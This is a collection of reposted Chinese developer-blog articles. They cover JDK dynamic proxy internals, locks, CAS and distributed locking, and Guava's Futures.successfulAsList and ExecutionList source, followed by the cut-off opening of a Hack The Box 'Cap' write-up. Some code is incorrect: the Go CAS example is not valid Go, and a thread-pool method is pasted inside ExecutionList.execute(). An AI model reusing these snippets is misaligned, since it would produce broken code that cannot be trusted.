198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
java复制代码Proxy类中
@CallerSensitive
public static Class<?> getProxyClass(ClassLoader loader,
Class<?>... interfaces)
throws IllegalArgumentException
{
final Class<?>[] intfs = interfaces.clone();
//安全校验
final SecurityManager sm = System.getSecurityManager();
if (sm != null) {
checkProxyAccess(Reflection.getCallerClass(), loader, intfs);
}
//根据类加载器和接口数组获取代理类或者生成代理的方法
return getProxyClass0(loader, intfs);
}
@CallerSensitive
public static Object newProxyInstance(ClassLoader loader,
Class<?>[] interfaces,
InvocationHandler h)
throws IllegalArgumentException
{
Objects.requireNonNull(h);

final Class<?>[] intfs = interfaces.clone();
final SecurityManager sm = System.getSecurityManager();
if (sm != null) {
checkProxyAccess(Reflection.getCallerClass(), loader, intfs);
}

/*
* Look up or generate the designated proxy class.
*/
Class<?> cl = getProxyClass0(loader, intfs);
//前面这一部分和getProxyClass方法是一致的
//下面这部分主要是根据invocationHandler作为参数获取代理类的实例对象
try {
if (sm != null) {
checkNewProxyPermission(Reflection.getCallerClass(), cl);
}
//获取构成类
final Constructor<?> cons = cl.getConstructor(constructorParams);
final InvocationHandler ih = h;
//判断是否是公共方法,如果不是设置访问权限
if (!Modifier.isPublic(cl.getModifiers())) {
AccessController.doPrivileged(new PrivilegedAction<Void>() {
public Void run() {
cons.setAccessible(true);
return null;
}
});
}
//通过构造器创建代理类实例
return cons.newInstance(new Object[]{h});
} catch (IllegalAccessException|InstantiationException e) {
throw new InternalError(e.toString(), e);
} catch (InvocationTargetException e) {
Throwable t = e.getCause();
if (t instanceof RuntimeException) {
throw (RuntimeException) t;
} else {
throw new InternalError(t.toString(), t);
}
} catch (NoSuchMethodException e) {
throw new InternalError(e.toString(), e);
}
}
//从缓存中获取代理类,如果不存在则生成
private static Class<?> getProxyClass0(ClassLoader loader,
Class<?>... interfaces) {
if (interfaces.length > 65535) {
throw new IllegalArgumentException("interface limit exceeded");
}
//缓存获取
return proxyClassCache.get(loader, interfaces);

}
//private final ConcurrentMap<Object, ConcurrentMap<Object, Supplier<V>>> map= new ConcurrentHashMap<>();
//WeakCache类中获取代理对象的方法
//key 是类加载器,parameter是接口数组
public V get(K key, P parameter) {
Objects.requireNonNull(parameter);

expungeStaleEntries();
//根据类加载器生成缓存key
Object cacheKey = CacheKey.valueOf(key, refQueue);

// 从缓存map中根据key获取valeuMap,这个valuesMap也是一个Map,其中key是类加载器,而value是一个Supplier,supplier是Java中函数式接口的消费者
//supplier其实就是Factory,Factory主要是查找到和生成对于代理类的处理类
ConcurrentMap<Object, Supplier<V>> valuesMap = map.get(cacheKey);
if (valuesMap == null) {
ConcurrentMap<Object, Supplier<V>> oldValuesMap
= map.putIfAbsent(cacheKey,
valuesMap = new ConcurrentHashMap<>());
if (oldValuesMap != null) {
valuesMap = oldValuesMap;
}
}

// 根据类加载器和接口生成子key,根据子key中valuesMap中获取supplier
// subKey from valuesMap
Object subKey = Objects.requireNonNull(subKeyFactory.apply(key, parameter));
Supplier<V> supplier = valuesMap.get(subKey);
Factory factory = null;
//自旋,如果supplier为空,则根据类加载器接口数组以及key\valuesMap生成Facotry,
while (true) {
//不为null的时候,从Facotory通过get方法获取value就是代理对象
if (supplier != null) {
// supplier might be a Factory or a CacheValue<V> instance
V value = supplier.get();
if (value != null) {
return value;
}
}
// 懒加载构建Factory
if (factory == null) {
factory = new Factory(key, parameter, subKey, valuesMap);
}

if (supplier == null) {
supplier = valuesMap.putIfAbsent(subKey, factory);
if (supplier == null) {
// successfully installed Factory
supplier = factory;
}
// else retry with winning supplier
} else {
if (valuesMap.replace(subKey, supplier, factory)) {
supplier = factory;
} else {
supplier = valuesMap.get(subKey);
}
}
}
}
//而Facotry对象又是基于ProxyClassFactory 去生成代理类的
private static final class ProxyClassFactory
implements BiFunction<ClassLoader, Class<?>[], Class<?>>
{
// 代理类名前缀
private static final String proxyClassNamePrefix = "$Proxy";

// 生成代理类的编号$proxy0/ $proxy1
private static final AtomicLong nextUniqueNumber = new AtomicLong();

@Override
public Class<?> apply(ClassLoader loader, Class<?>[] interfaces) {
//用于校验是否重复接口
Map<Class<?>, Boolean> interfaceSet = new IdentityHashMap<>(interfaces.length);
//遍历接口数组做处理
for (Class<?> intf : interfaces) {
//根据类加载器,接口名称获取接口类
Class<?> interfaceClass = null;
try {
interfaceClass = Class.forName(intf.getName(), false, loader);
} catch (ClassNotFoundException e) {
}
if (interfaceClass != intf) {
throw new IllegalArgumentException(
intf + " is not visible from class loader");
}
//判断是否是接口
if (!interfaceClass.isInterface()) {
throw new IllegalArgumentException(
interfaceClass.getName() + " is not an interface");
}
//校验是否重复接口
if (interfaceSet.put(interfaceClass, Boolean.TRUE) != null) {
throw new IllegalArgumentException(
"repeated interface: " + interfaceClass.getName());
}
}

String proxyPkg = null; // package to define proxy class in
int accessFlags = Modifier.PUBLIC | Modifier.FINAL;

//校验非public接口是否在同一个包里,不同包的非public接口不能代理
for (Class<?> intf : interfaces) {
int flags = intf.getModifiers();
if (!Modifier.isPublic(flags)) {
accessFlags = Modifier.FINAL;
String name = intf.getName();
int n = name.lastIndexOf('.');
String pkg = ((n == -1) ? "" : name.substring(0, n + 1));
if (proxyPkg == null) {
proxyPkg = pkg;
} else if (!pkg.equals(proxyPkg)) {
throw new IllegalArgumentException(
"non-public interfaces from different packages");
}
}
}
//定义代理类的包名
if (proxyPkg == null) {
// if no non-public proxy interfaces, use com.sun.proxy package
proxyPkg = ReflectUtil.PROXY_PACKAGE + ".";
}
long num = nextUniqueNumber.getAndIncrement();
String proxyName = proxyPkg + proxyClassNamePrefix + num;
//生成代理类,根据代理类包名、接口数组生成代理类字节码
byte[] proxyClassFile = ProxyGenerator.generateProxyClass(
proxyName, interfaces, accessFlags);
try {
//使用类加载器把生成好的代理类在运行过程中调用jvm中
return defineClass0(loader, proxyName,
proxyClassFile, 0, proxyClassFile.length);
} catch (ClassFormatError e) {
throw new IllegalArgumentException(e.toString());
}
}
}
//代理类生成、写入文件中
public static byte[] generateProxyClass(final String var0, Class<?>[] var1, int var2) {
//构建生成代理类实例
ProxyGenerator var3 = new ProxyGenerator(var0, var1, var2);
//改方法是生成代理类的字节码文件,里面主要工作是把接口根据全限定类名获取方法描述等信息构建一个方法数组以及相关信息生成一个代理类字节数组流,然后写入文件中
final byte[] var4 = var3.generateClassFile();
if (saveGeneratedFiles) {
AccessController.doPrivileged(new PrivilegedAction<Void>() {
public Void run() {
try {
int var1 = var0.lastIndexOf(46);
Path var2;
if (var1 > 0) {
Path var3 = Paths.get(var0.substring(0, var1).replace('.', File.separatorChar));
Files.createDirectories(var3);
var2 = var3.resolve(var0.substring(var1 + 1, var0.length()) + ".class");
} else {
var2 = Paths.get(var0 + ".class");
}

Files.write(var2, var4, new OpenOption[0]);
return null;
} catch (IOException var4x) {
throw new InternalError("I/O exception saving generated file: " + var4x);
}
}
});
}

return var4;
}

总结:
1.jdk动态代理其实就是通过Java反射把被代理类的接口方法获取到然后生成一个新的代理类,通过类加载器把生成的代理类字节码动态调入jvm中从而实现动态代理。
2.jdk动态代理只能代理基于接口的被代理对象,非接口是不支持的)

2.cglib代理(支持非接口被代理对象)
待续….

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

架构知识实践与总结-锁 锁的本质 锁的实现 锁的问题 分布式

发表于 2021-11-29

现代计算机基本都是多核,而且我们的业务进程通常会运行在多台计算机上。不管是一台计算机上的多个线程还是运行在多台计算上的不同进程在处理系统资源时难免会出现冲突,为了解决共享资源的冲突问题我们经常需要加锁处理。

举两个常见的例子。

例1:a=0,10个线程同时执行a++,在程序运行多次后会发现每次得到a的值是不确定的,如果想保证a最后的值是10,则可以通过加锁,把并发的线程串行化。

例2:某电商平台限量抢购活动,商品A只能抢购50件,如何保证最后只卖出去50件。 我们也可以依赖锁机制,每次扣件库存都加锁。这里的加锁不一定必须是我们业务代码加锁,也可以是数据库的行锁或者依赖其它中间件的分布式锁。

锁的本质

结合上面的两个例子,说一说我对锁的理解。锁的本质是:业务场景中存在共享资源,多个进程或线程需要竞争获取并处理共享资源,为了保证公平、可靠、结果正确等业务逻辑,要把并发执行的问题变为串行,串行时引入第三方锁当成谁有权限来操作共享资源的判断依据。

这就成功把业务问题抽象成了取锁问题。那在计算机中是如何处理锁问题的呢?

锁的实现

锁的实现最根本的还是需要硬件支持,CPU提供了原子操作的指令,比如在X86、ARM等架构中都提供了一些机制保证多条操作指令在一个原子操作中执行。这些原子操作是我们实现锁的基础。

操作系统对CPU提供的锁又进一步进行了封装,比如Linux操作系统就提供了自旋锁(spinlock)、互斥锁(mutex)、读写锁(dwlock)、RCU锁等一些常用的逻辑锁。

我们用来做业务开发的各种语言又在操作系统和汇编基础之上给我们提供了更加方便的、开箱即用的锁结构。比如Golang中的互斥锁(sync.Mutex)、读写锁(sync.RWMutex)、automic的各种原子操作。

锁的问题

我们可以把锁分为悲观锁和乐观锁两类。所谓悲观锁就是假定其它线程会产生共享资源的竞争,一定要先获取锁结构才执行后续的逻辑。乐观锁恰好相反,认为不一定会产生竞争,直接修改值如果成功了就达成目标,如果不成功再进行重试,直到成功或者超时。

CAS(compare and swap)是实现乐观锁的一种典型技术。 在CAS机制中存在三个基本操作值,value内存值,old旧预期值,new预期值。

1
2
3
4
5
6
7
go复制代码func compareAndSwap(value int, old int, new int) bool{
    if (value !=old){
        return False
    }
    *value= new
    return True
}

如上面的代码,我们比较value和old是否相等,如果不相等说明old值已经被修改,取锁失败;如果相等则把new赋值给value,取锁成功。当取锁失败时,会修改value的值为当前值等待进行下一次取锁,直到超时或者取锁成功。

CAS有一个典型的问题:ABA。所谓ABA问题是指,在执行CAS操作时,其它并发执行的线程把内存值A修改为B,之后又修改为A,CAS机制认为A没有变化,其实A中间已经产生了变化状态,这就可能导致多个线程同时获取到锁。解决ABA问题的典型解决方案是增加版本号,Golang和Java语言中也都有相关实现。加版本号的具体方法是在并发执行的多个线程修改变量A时,增加一个递增的版本号,执行成功的条件需要版本号也保持一致,而且执行成功后版本号+1,这就保证了多个进程同时只能有一个获取到锁,也不会因为重试产生逻辑问题。

分布式锁

为了保证系统的高可用,很多进程都需要部署多个实例,为了能让多个实例正常处理共享资源,就没法在这些实例的内部用同一个锁,因此必须引入第三方系统来实现锁。我们可以依赖MySQL的行锁、Redis的原子操作等实现锁。

依赖第三方系统生成锁结构时,三方系统需要保障自己高可用。比如我们用单机的Redis来实现锁操作,单机的Redis如果宕机了就会造成所有进程取锁失败。为了保证Redis的高可用,我们可以采用主从的架构模式,当我们采用主从架构时会存在Master节点同步数据到Slave节点的时间延迟。如果AB两个进程,A在Master节点获取到锁结构之后,数据同步到Slave节点之前,B进程读Slave节点的数据发现没有此锁,也修改某个key的值获取到了锁,这就会导致AB同时获得到锁,这明显违背了使用锁的初衷。

Redis做分布式锁时也存在其它解决方案,我们只是举例说明问题。

综上我们依赖的三方系统需要保持其对外数据的一致性,也就是我们通常所说的CAP理论中的C(Consistency)特性,基于此特性开源软件中ETCD和Zookeeper都是不错的选择。

在实际工作中是自研还是选择一种开源产品做分布式锁,最终还要看我们的业务场景,如果需要强一致的CP模型,那我们首选ETCD,如果可以存在一些不一致情况Redis也是不错的选择。当然还要结合业务的调用量、运维能力等综合考虑。

注意问题:锁的实现,不管是CAS还是其它实现方式都比较消耗CPU性能,所以如果能通过业务逻辑设计避免使用锁是最好的。

锁的力度越小越好。

Sharding是提高锁效率的一种有效手段。

总结

本文我们主要介绍了计算机中的锁,简单介绍了锁的实现方式,锁的常见问题和如何选择分布式锁。文中没有对具体一种实现方式做源码级的剖析,更多的是站在旁观者的角度思考锁问题的原理和本质。

以上纯属个人学习、总结的一些观点,欢迎大家私信交流。

诚邀关注公众号:一行舟

每周更新技术文章,和大家一起进步。

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

Guava的FuturessuccessFulAsList

发表于 2021-11-29

1.前置知识

首先要了解Futures.successFulAsList方法原理,我们需要一下前置知识.

  • ListenableFuture这个接口,它是基于Future的子接口,而Guava 在的异步任务类基本都是实现了这个接口实现的,而具体异步任务类ListenableFutureTask除了实现了ListenableFuture这个接口之外还继承了jdk中的异步任务类FutureTask,
  • 简单来说ListenableFutureTask 其实就是对FutureTask进行了扩展封装。

2.Futures执行流程图:

Futures执行流程.png

所以我们要看到Futures.successFulAsList的源码和原理还需要了解FutureTask的原理。(相关原理可以参考 FutureTask参考)

3.对于ListenableFutureTask这个类的分析

ListenableFutureTask是guava扩展futureTask的一个很重要的类,后续guava的Futures.successFulList为什么能把多个futureTask合并也是基于该实现类,所以这个类非常重要,下面开始对这个类进行分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
typescript复制代码public class ListenableFutureTask<V> extends FutureTask<V>
implements ListenableFuture<V> {

// The execution list to hold our listeners.
private final ExecutionList executionList = new ExecutionList();

public static <V> ListenableFutureTask<V> create(Callable<V> callable) {
return new ListenableFutureTask<V>(callable);
}
@Override
public void addListener(Runnable listener, Executor exec) {
executionList.add(listener, exec);
}

//任务执行结束后就会调用ExecutionList的execute方法就会开始执行监听器(这个监听器就行下面那个问题的答案,何时开始执行任务future的监听器类获取结果。)
@Override
protected void done() {
executionList.execute();
}

从上面源码我们可以看到,ListenableFutureTask其实就是对FutureTask进行扩展了,它是如何扩展?可以看到done()方法,该方法在FutureTask执行完成后会自动调用该钩子方法,表示FutureTask任务已经完成,然后就可以执行监听器链了。另外ListenableFutre是有一个监听器执行列表该表是一个单链表,用于执行回调方法用的。

4.Futures.successFulAsList 的简单使用

首先Futures.successFulAsList它的作用,当我们创建多个异步任务的时候,我们可能需要一个个的调用get方法获取结果,而且这个给获取结果的过程可能是阻塞的(任务没完成时),而且需要我们一个个的去调用,那么successFulAsList的作用就是帮助我们把多个future的聚合成一个ListtenableFutre
然后我们再通过调用聚会后的这个ListenableFutre就可以获取到所有futre的结果集了(整个整合过程也是异步处理的)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ini复制代码下面是简单用法。

ListeningExecutorService listeningExecutorService = MoreExecutors.listeningDecorator(Executors.newFixedThreadPool(5));
ListenableFuture<String> lf1 = listeningExecutorService.submit(() -> {
return "listFuture1";
});
ListenableFuture<String> lf2 = listeningExecutorService.submit(() -> {
return "listFuture2";
});
List<ListenableFuture<String>> listenableFutures = Lists.newArrayList(lf1, lf2);
ListenableFuture<List<String>> listListenableFuture = Futures.successfulAsList(listenableFutures);
Thread thread = new Thread(() -> {
while (true) {
System.out.println(Thread.currentThread().getName()+"并发工作中.....");
if (listListenableFuture.isDone()){
break;
}
}
},"test-thread");

System.out.println(listListenableFuture.get());

3.successFulAsList 的原理及源码分析

首先当successFulAsList传入多个future时后会调用 Futures.lsitFuture这个方法,这个方法其实没干啥,就是创建了一个用来整合多个future的CombinedFuture类以及一个future结果处理的FutureCombiner接口的处理逻辑

  • listFuture这个方法处理主要是通过把future集传递给CombinedFutre这个类来处理ListenableFuture集,
  • 这个CombinedFuture功能和名字一样就是联合几个future集一起处理,一般需要传入一个Future集,以及执行监听器任务的线程池,
  • 同时需要传入FutureCombiner接口的实现类,这个接口主要是用来把CombinedFutre内部执行完Future集之后的结果是如何处理的,
  • 而下面这个是把结果集通过一个list存储起来返回,因为这个ListenableFuture其实主要功能就是可以提交一个List的Future去处理并且返回多个Future执行结果集,而不需要类似于Java中FutureTask,一个一个获取结果,然后存储在list中,guava其实就是把这一般进行封装,同时扩展了future执行完成后可以进行这些future的监听器,以及回调函数。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
swift复制代码//传入多个Futres然后以及线程池去处理,返回一个futeres 执行成功的结果集。
@Beta
public static <V> ListenableFuture<List<V>> successfulAsList(
Iterable<? extends ListenableFuture<? extends V>> futures) {
//先通过拷贝元素把ListenableFuture集变成一个不可变,然后调用listFuture,传入listenableFuture集,是否全部的必须成功以及线程池,listFuture正方法是把futures做处理的
return listFuture(ImmutableList.copyOf(futures), false, directExecutor());
}

private static <V> ListenableFuture<List<V>> listFuture(
ImmutableList<ListenableFuture<? extends V>> futures,
boolean allMustSucceed, Executor listenerExecutor) {
return new CombinedFuture<V, List<V>>(
futures, allMustSucceed, listenerExecutor,
//这直接new了一个接口然后写了如何把future结果结合起来返回。
new FutureCombiner<V, List<V>>() {
@Override
//由于这些可能存在则npe问题,所以内部处理的时候采用了Optional来处理避免NPE
public List<V> combine(List<Optional<V>> values) {
List<V> result = Lists.newArrayList();
for (Optional<V> element : values) {
//如果是异常或者没有数据,则添加null处理
result.add(element != null ? element.orNull() : null);
}
//最后
return Collections.unmodifiableList(result);
}
});
}

3.1 CombinedFuture类分析

CombinedFuture主要是给多个Future设置监听器,然后通过线程池执行监听器链,每个监听器都会调用setOneValue这个方法,然后在这个方法里进行自旋获取future的结果。

我们先看看CombinedFuture类的相关成员变量:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
scala复制代码/CombinedFuture是一个把多个future联合处理的一个静态内部类
private static class CombinedFuture<V, C> extends AbstractFuture<C> {
private static final Logger logger = Logger.getLogger(CombinedFuture.class.getName());
//ListenableFuture 任务集
ImmutableCollection<? extends ListenableFuture<? extends V>> futures;
//是否必须区别执行成功,SuccessASFuture只返回执行成功的,allAsFuture需要区别执行成功,有一个失败都返回失败结果
final boolean allMustSucceed;
//记录剩余需要执行的future个数
final AtomicInteger remaining;
//把futre任务结果处理的一个类
FutureCombiner<V, C> combiner;
List<Optional<V>> values;
//异常锁
final Object seenExceptionsLock = new Object();
//存储出现的异常信息
Set<Throwable> seenExceptions;

//构造函数初始化相关参数并且调用init开始执行获取future结果
CombinedFuture(
ImmutableCollection<? extends ListenableFuture<? extends V>> futures,
boolean allMustSucceed, Executor listenerExecutor,
FutureCombiner<V, C> combiner) {
//先初始化参数
this.futures = futures;
this.allMustSucceed = allMustSucceed;
//初始化没执行的future个数为future集的大小,主要这个类是原子类,是线程安全的。
this.remaining = new AtomicInteger(futures.size());
this.combiner = combiner;
//存储结果的一个list,会先根据futures的大小创建
this.values = Lists.newArrayListWithCapacity(futures.size());
//初始化方法,主要是作业是获取future结果,并且增加CombinedFuture类的监听器,future集执行完成之后相关参数清除。
//而且它必须在构造函数结尾调用,init方法使用了很多ConbinedFuture的成员变量。
init(listenerExecutor);
}

这个init其实就是对上面的成员变量进行初始化以及为各个ListenableFuture设置监听器来回调setOneValue ,同时也会设置一个监听器是处理future结束进行清理工作的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
java复制代码    protected void init(final Executor listenerExecutor) {
//先添加一个监听器处理futre执行完成后进行相关清理工作
addListener(new Runnable() {
@Override
public void run() {
// 遍历调用future.cancel方法处理.
if (CombinedFuture.this.isCancelled()) {
for (ListenableFuture<?> future : CombinedFuture.this.futures) {
future.cancel(CombinedFuture.this.wasInterrupted());
}
}

//把futures的引用是否,等待gc回收
CombinedFuture.this.futures = null;

// By now the values array has either been set as the Future's value,
// or (in case of failure) is no longer useful.
CombinedFuture.this.values = null;

// The combiner may also hold state, so free that as well
CombinedFuture.this.combiner = null;
}
}, directExecutor());

//如果futures是空的则调用AbstractFuture抽象类上的set方法把把空的不可变结果集设置为Future的结果,内部有一个基于AQS的子类Sync通过cas处理
if (futures.isEmpty()) {
//先调用FutureCombiner的combine方法把这个结果遍历添加的list里面(开头那个接口里有combine相关处理流程)
set(combiner.combine(ImmutableList.<Optional<V>>of()));
return;
}


// 它会先把结果集全部用null占位.
for (int i = 0; i < futures.size(); ++i) {
values.add(null);
}

//遍历future任务集,并且为每个future添加监听器,
//future任务都完成之后就会调用监听器,
int i = 0;
for (final ListenableFuture<? extends V> listenable : futures) {
final int index = i++;
listenable.addListener(new Runnable() {
@Override
public void run() {
//setOneValue是调用linstenable.get()(其实就是future.get())
setOneValue(index, listenable);
}
}, listenerExecutor);
}
}

上图中的第二个addListener增加监听器后会跑到ListenableFutureTask 这个具体实现类中添加监听器,它有一个executionList监听器成员变量,这个变量是一个单链表的执行器类

下面这个是ListenableFutureTask 的addListener:

1
2
3
4
typescript复制代码  @Override
public void addListener(Runnable listener, Executor exec) {
executionList.add(listener, exec);
}

下面来看一下ExecutionList这个类是如何处理新增的监听器的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
java复制代码//executionList 和字面意识一样是一个执行列表,他其实就是包含多个Runnable的list加线程池的组合
//前置知识线程池的执行流程
public final class ExecutionList {

@VisibleForTesting static final Logger log = Logger.getLogger(ExecutionList.class.getName());
//一个封装了Runnable 和线程池的单链表类
@GuardedBy("this")
private RunnableExecutorPair runnables;
//判断这个执行列表类的runnables这个单链表是否已经被执行过
@GuardedBy("this")
private boolean executed;

/** Creates a new, empty {@link ExecutionList}. */
public ExecutionList() {}

//添加一个执行任务,需要提供一个基于runnable接口的实现类以及一个线程池
public void add(Runnable runnable, Executor executor) {

Preconditions.checkNotNull(runnable, "Runnable was null.");
Preconditions.checkNotNull(executor, "Executor was null.");

//在执行链表添加节点时,通过synchronized锁住这个类,避免线程安全问题
synchronized (this) {
if (!executed) {
runnables = new RunnableExecutorPair(runnable, executor, runnables);
return;
}
}
//默认添加完之后会,参数把这个任务丢个线程池去处理,并不一定能处理成功,可能会存储在线程池的阻塞队列里
executeListener(runnable, executor);
}

//具体执行方法,他会先判断是否已经调用过execute这个方法执行链表,如果没有,
//则拿到执行链表的表头用一个临时链表存储表头,然后把这个类的链表置空
//由于添加链表节点的时候采用的是头插法,所以需要进行一次链表反转,然后遍历链表把runnbale交给线程池处理,
//这个有个坑,如果不熟悉线程池执行流程的话,可能会以为,这里链表存储了一次,然后add完之后交给线程池要么执行,要么存放在阻塞队列里,
//会以为出现两次执行,但是如果看过线程池源码的话,其实你可以发现当runnable被线程执行完之后,会把这个runnable置空,然后结合Java的基础知识
//包装类型以及对象类型、数组类型等参数传递过程是传递对象的地址,所以在修改传递的对象时,存放在其他地方的引用也会发生改变,所以如果runnable执行过
//那么在executeList中的执行链中这个runnable是已经被置空了的,然后线程池在线程执行
public void execute() {
// Lock while we update our state so the add method above will finish adding
// any listeners before we start to run them.
RunnableExecutorPair list;
synchronized (this) {
if (executed) {
return;
}
//把表示表示为已经执行过
executed = true;
//拿到执行链表头
list = runnables;
//置空,等待GC回收
runnables = null; // allow GC to free listeners even if this stays around for a while.
}

//线程池Executor中线程执行任务的方法
final void runWorker(Worker w) {
Thread wt = Thread.currentThread();
//拿到 Worker 中的runnable
Runnable task = w.firstTask;
w.firstTask = null;
w.unlock(); // allow interrupts
boolean completedAbruptly = true;
try {
//这些是先执行当前worker节点中的任务,执行完之后会从任务队列里一直循环取任务执行任务,
//执行完一个runnable任务后会置为空等待GC回收
while (task != null || (task = getTask()) != null) {
w.lock();
// If pool is stopping, ensure thread is interrupted;
// if not, ensure thread is not interrupted. This
// requires a recheck in second case to deal with
// shutdownNow race while clearing interrupt
if ((runStateAtLeast(ctl.get(), STOP) ||
(Thread.interrupted() &&
runStateAtLeast(ctl.get(), STOP))) &&
!wt.isInterrupted())
wt.interrupt();
try {
beforeExecute(wt, task);
Throwable thrown = null;
try {
task.run();
} catch (RuntimeException x) {
thrown = x; throw x;
} catch (Error x) {
thrown = x; throw x;
} catch (Throwable x) {
thrown = x; throw new Error(x);
} finally {
afterExecute(task, thrown);
}
} finally {
task = null;
w.completedTasks++;
w.unlock();
}
}
completedAbruptly = false;
} finally {
processWorkerExit(w, completedAbruptly);
}
}
//链表反转
RunnableExecutorPair reversedList = null;
while (list != null) {
RunnableExecutorPair tmp = list;
list = list.next;
tmp.next = reversedList;
reversedList = tmp;
}
//遍历链表交给线程池执行
while (reversedList != null) {
executeListener(reversedList.runnable, reversedList.executor);
reversedList = reversedList.next;
}
}

//添加完成后尝试把这个任务丢个线程池处理
private static void executeListener(Runnable runnable, Executor executor) {
try {
executor.execute(runnable);
} catch (RuntimeException e) {
log.log(Level.SEVERE, "RuntimeException while executing runnable "
+ runnable + " with executor " + executor, e);
}
}

//静态内部类,封装runnable以及对应执行runnbale的线程池
private static final class RunnableExecutorPair {
final Runnable runnable;
final Executor executor;
@Nullable RunnableExecutorPair next;
//基于头插法添加
RunnableExecutorPair(Runnable runnable, Executor executor, RunnableExecutorPair next) {
this.runnable = runnable;
this.executor = executor;
this.next = next;
}
}
}

在上面这个ExecutionList这个类中先add方法判断这个执行链是否已经开始执行了,如果没开始执行他会先添加到链表头,然后返回,如果已经开始执行了则调用executeListener这个方法让线程池执行。

那么这些Future的监听器是何时开始执行的?

(这个可以去看我另外一篇博客FutureTask源码分析,里面会提到:)

这个其实就是给future设置的监听器处理,然后内部有一个促发回调机制,促发之后就执行监听器方法会回调setOneValue这个方法。
下面看看setOneValue方法是是怎么处理的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
scss复制代码   /**
* 根据指定索引index,把future的结果设置进values这个结果集。
*/
private void setOneValue(int index, Future<? extends V> future) {
List<Optional<V>> localValues = values;
//如果任务已经完成或者结果集为空,然后进行判断是否是需要所有的Future成功才处理返回结果集,否则这个一段逻辑不受影响
if (isDone() || localValues == null) {
// Some other future failed or has been cancelled, causing this one to
// also be cancelled or have an exception set. This should only happen
// if allMustSucceed is true or if the output itself has been
// cancelled.
checkState(allMustSucceed || isCancelled(),
"Future was done before all dependencies completed");
}

try {
//判断当前传入需要获取结果这个future是否已经完成.
checkState(future.isDone(),
"Tried to set value from future which is not done");
//调用不可中断方法自旋获取future结果
V returnValue = getUninterruptibly(future);
if (localValues != null) {
//然后如果结果存在则把结果设置为指定索引的位置
localValues.set(index, Optional.fromNullable(returnValue));
}
} catch (CancellationException e) {
if (allMustSucceed) {
// Set ourselves as cancelled. Let the input futures keep running
// as some of them may be used elsewhere.
cancel(false);
}
} catch (ExecutionException e) {
setExceptionAndMaybeLog(e.getCause());
} catch (Throwable t) {
setExceptionAndMaybeLog(t);
} finally {
//记录剩余没执行完成的future个数
int newRemaining = remaining.decrementAndGet();
checkState(newRemaining >= 0, "Less than 0 remaining futures");
//如果这个个数等于零证明是最后一个
//则通过combiner接口的实现方法去把结果联合起来并且设置到AbstractFuture中的value(这个value就是get()方法获取的结果集)
if (newRemaining == 0) {
FutureCombiner<V, C> localCombiner = combiner;
if (localCombiner != null && localValues != null) {
//调用AbstractFuture的set方法把 FutureCombine.combine处理后的结果集设置到value中.
set(localCombiner.combine(localValues));
} else {
checkState(isDone());
}
}
}
}
}

每次future的监听器执行后会执行setOneValue方法,这个方法会判断当前这个future是否已经执行过,如果没完成任务则调用getUniterruptible这个方法不可中断的自旋调用future.get方法获取结果
然后存储在临时结果集的value中。然后当执行到最后一个是会通过set方法把整个聚会后的结果集赋值到futureTask 的value。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
java复制代码//Uninterruptibles类中的getUniterruptible 不间断的调用get方法 其实就是类似于Future中get方法获取任务执行的结果,
//而且是不可被中断的,中断之后重新设置可中断标记为TRUE
public static <V> V getUninterruptibly(Future<V> future)
throws ExecutionException {
boolean interrupted = false;
try {
//自旋是为了如果被中断,重新设置中断标记后重新执行get,从而达到不可中断的效果
while (true) {
try {
return future.get();
} catch (InterruptedException e) {
interrupted = true;
}
}
} finally {
//任务执行完成之后才把当前线程中断
if (interrupted) {
Thread.currentThread().interrupt();
}
}
}

//AbstractFuture抽象类中set方法调用aqs子类syn.set设置结果集,然后开始调用执行监听器执行链
protected boolean set(@Nullable V value) {
//调用内部aqs子类的sync通过cas设置AbstractFutre的结果
boolean result = sync.set(value);
//如果设置成功则判断设置成功,如果成功则证明listenablefuture任务集执行完成,开始执行监听器执行链
if (result) {
executionList.execute();
}
return result;
}

总结:successFulList是如何合并多个Future结果的:successFulAsList这个方法核心原理: 利用ListenableFuture 这个接口的监听器方法然后 每个这个接口的实现类都会有有一个ExecutionList类的成员变量,然后这个ExecutionList内部一个封装着Runnable以及线程池的单链表,除此之外这个ExecutionList还有一个变量executed,这个变量是用来控制对于ListenableFuture相关实现类新增监听器时,是否立刻执行还是添加在链表里面,另外当ListenableFuture这个类的子任务类,当任务的future类完成时就会促发调用ExecutionList这个类的execute这个方法进行执行每个future的监听器,在SuccessFulList这个方法中通过创建CombinedFuture类去给各个任务的future添加监听器去调用setOneValue这个方法,然后这个方法去获取future结果.当最后一个任务Future结果获取完成后,就把结果设置到顶层的

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

【HTB】Cap(数据报分析,setuid能力:python

发表于 2021-11-29

免责声明

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。

服务探测

1
2
3
4
5
6
7
8
